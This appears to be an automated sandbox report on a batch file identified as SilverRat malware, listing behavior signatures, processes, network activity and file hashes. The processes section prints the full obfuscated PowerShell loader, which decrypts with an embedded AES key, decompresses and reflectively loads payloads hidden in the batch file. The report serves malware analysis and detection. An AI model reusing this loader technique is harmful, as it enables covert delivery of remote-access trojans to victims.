Analysis Overview
SHA256
d9afd4677b6374d120c2408bdc25c4d5fa2625ece198e0c0eed45960edee89b4
Threat Level: Known bad
The file rthingy.bat was found to be: Known bad.
Malicious Activity Summary
SilverRat
Silverrat family
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-14 09:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-14 09:36
Reported
2025-02-14 09:39
Platform
win11-20250210-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
SilverRat
Silverrat family
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3418141264-4181727730-1624968314-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3904 wrote to memory of 1084 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3904 wrote to memory of 1084 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rthingy.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Meo76zIdzGxWzcGjAKAOLGgRVR1B6hHfBtJu6auoogA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ru86nRFMP8Q91uK61+/ow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dAblc=New-Object System.IO.MemoryStream(,$param_var); $shsCO=New-Object System.IO.MemoryStream; $SyeQT=New-Object System.IO.Compression.GZipStream($dAblc, [IO.Compression.CompressionMode]::Decompress); $SyeQT.CopyTo($shsCO); $SyeQT.Dispose(); $dAblc.Dispose(); $shsCO.Dispose(); $shsCO.ToArray();}function execute_function($param_var,$param2_var){ $tTPRa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wQaXC=$tTPRa.EntryPoint; $wQaXC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rthingy.bat';$lVTof=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rthingy.bat').Split([Environment]::NewLine);foreach ($pGkrh in $lVTof) { if ($pGkrh.StartsWith(':: ')) { $PioZz=$pGkrh.Substring(3); break; }}$payloads_var=[string[]]$PioZz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkNGRkIzNEMtNTAxMC00Njk3LThGMjMtNTVGMjVDOEQyOThCfSIgdXNlcmlkPSJ7NkRCQTg2QzUtMjAyMC00RTcyLTkzMEQtQTg2NkFGQ0FDMjBDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7OEJCMzU4RTYtNkVDNS00RTY3LTgyNjctOTE2NDQ4M0Y5N0Q0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4NDAzMyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjU2MjA2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU2MjE1MjgwMzgiLz48L2FwcD48L3JlcXVlc3Q-
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| NL | 4.175.87.113:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 199.232.210.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
Files
memory/1084-0-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttrtiaum.rkg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1084-9-0x000001FEE8440000-0x000001FEE8462000-memory.dmp
memory/1084-10-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
memory/1084-11-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
memory/1084-12-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
memory/1084-14-0x000001FEE84D0000-0x000001FEE84DE000-memory.dmp
memory/1084-13-0x000001FED0320000-0x000001FED0328000-memory.dmp
memory/1084-15-0x000001FEE8500000-0x000001FEE8510000-memory.dmp
memory/1084-18-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp
memory/1084-19-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 1f2c3f2201f48d8183a4d61d798177e5 |
| SHA1 | ff85fab86cb79b8ac862b879ab272d8f9b0bbec4 |
| SHA256 | 22be5badfa40ffa908d70638e28419b940437e5140925138164bac9a474770e9 |
| SHA512 | 1597efbb2d05fd309573c529a6a0608d90730d4d90f362c529aaa16d564c7e82b963b06b8d68ee3404a981318c5fcedd0ea5e117e2bc92ed88108864b708d27d |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | fc6dd02bcc9dcd70d2d2e6f2bf6a8480 |
| SHA1 | a804945de20c3c5c7d9e20ba5a29d989f71736fd |
| SHA256 | 205cd193614c5c6ecde093110505bd11d404520b992be7f0ebe3bb75c4c7ba4b |
| SHA512 | 0852b513ebcfb57cf5da8a10db5cd6723913ebb90ed25efb3d3e8ee1a3ef1e32ae9b41b0ada3505ace90a98938ed4b9d926884b3d9db40a9e74a97aa32625d20 |